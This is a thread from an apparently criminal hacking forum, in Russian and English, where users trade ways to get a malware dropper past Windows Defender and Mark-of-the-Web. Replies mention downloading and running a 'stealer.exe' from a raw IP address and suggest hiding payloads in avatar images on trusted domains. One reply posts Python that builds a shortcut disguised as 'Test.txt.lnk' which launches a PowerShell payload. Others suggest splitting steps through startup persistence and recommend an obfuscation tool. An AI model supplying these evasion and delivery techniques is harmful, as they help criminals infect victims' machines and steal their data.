• XSS.stack #1 – первый литературный журнал от юзеров форума

актуальные методы обфускации VB6/VBA

Chips

floppy-диск
Пользователь
Регистрация
03.05.2024
Сообщения
8
Реакции
0
Гарант сделки
2
кто-нибудь может подсказать актуальные методы обфускации PowerShell и / или VB6/VBA макросов, которые не палятся дефендером? на форуме особо ничего не смог найти. на гитхабе всё дохлое и определяется эвристическим анализом как троян вне зависимости от нагрузки чистого кода.
мб кто знает, где искать, или подскажет в сторону гайдов для собственного переписывания?
 
У тебя на psh/vb дроппер или сама малварь?
потенциально только дроппер.
я изначально смог успешно протестить его с шифром подстановки и StrReverse, он проходил MotW и дефендер, но сейчас при похожей структуре винда моментально банит файл, даже если он из зипа распаковывается; теперь ищу альтернативу, может, тут кто-нибудь рабочую обфускацию подскажет
 
потенциально только дроппер.
я изначально смог успешно протестить его с шифром подстановки и StrReverse, он проходил MotW и дефендер, но сейчас при похожей структуре винда моментально банит файл, даже если он из зипа распаковывается; теперь ищу альтернативу, может, тут кто-нибудь рабочую обфускацию подскажет
А что дроппер делает? Просто загружает и запускает http://1.4.8.8/stealer.exe ?Попробуй пейлоад в картинке аватарок загружать с доверенного домена типо https://filestore.community.support...leimages/864bafb6-3179-432e-877a-b48137f57c04
 
А что дроппер делает? Просто загружает и запускает http://1.4.8.8/stealer.exe ?Попробуй пейлоад в картинке аватарок загружать с доверенного домена типо https://filestore.community.support...leimages/864bafb6-3179-432e-877a-b48137f57c04
вопрос, возможно, тупой, но есть ли какие-то гайды на форуме? я про доставку с подгрузкой и .lnk мельком слышал, но разобраться не смог и думал, что проще и актуальнее всего сейчас через макросы в доке доставлять
 
вопрос, возможно, тупой, но есть ли какие-то гайды на форуме? я про доставку с подгрузкой и .lnk мельком слышал, но разобраться не смог и думал, что проще и актуальнее всего сейчас через макросы в доке доставлять
скрипт создает .lnk ярлык с psh пейлоадом
Python:
#pip install pywin32 winshell
import os
import winshell
from win32com.client import Dispatch

# Определяем путь к .lnk файлу
desktop = winshell.desktop()
path = os.path.join(desktop, "Test.txt.lnk")

# Создаем ссылку на Shell объект
shell = Dispatch('WScript.Shell')

# Создаем ярлык
shortcut = shell.CreateShortCut(path)
shortcut.TargetPath = "powershell.exe"
shortcut.Arguments = "-Command \"ping -r google.com\"" #Здесь powershell payload например
shortcut.WorkingDirectory = os.getenv("USERPROFILE")
shortcut.IconLocation = "powershell.exe, 0" #Иконку можете сменить на любую здесь или через ResourceHacker
shortcut.save()
 
скрипт создает .lnk ярлык с psh пейлоадом
Python:
#pip install pywin32 winshell
import os
import winshell
from win32com.client import Dispatch

# Определяем путь к .lnk файлу
desktop = winshell.desktop()
path = os.path.join(desktop, "Test.txt.lnk")

# Создаем ссылку на Shell объект
shell = Dispatch('WScript.Shell')

# Создаем ярлык
shortcut = shell.CreateShortCut(path)
shortcut.TargetPath = "powershell.exe"
shortcut.Arguments = "-Command \"ping -r google.com\"" #Здесь powershell payload например
shortcut.WorkingDirectory = os.getenv("USERPROFILE")
shortcut.IconLocation = "powershell.exe, 0" #Иконку можете сменить на любую здесь или через ResourceHacker
shortcut.save()
интересно, спасибо!
 
Try "phish for persistence" style. Instead of downloading and executing a payload right away break it up by dropping something in startup or editing a commonly used shortcut etc to de-chain suspicious steps in heuristic analysis
I'll look into that, ty!
 
can anyone suggest current methods for obfuscating PowerShell and/or VB6/VBA macros that do not fall into defender? I couldn’t find anything special on the forum. everything is dead on the github and is defined by heuristic analysis as a Trojan, regardless of the load of the clean code.
mb who knows where to look, or will he suggest guides for his own rewriting?
the best one is https://github.com/danielbohannon/Invoke-Obfuscation
it is full of great idea just mix them
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх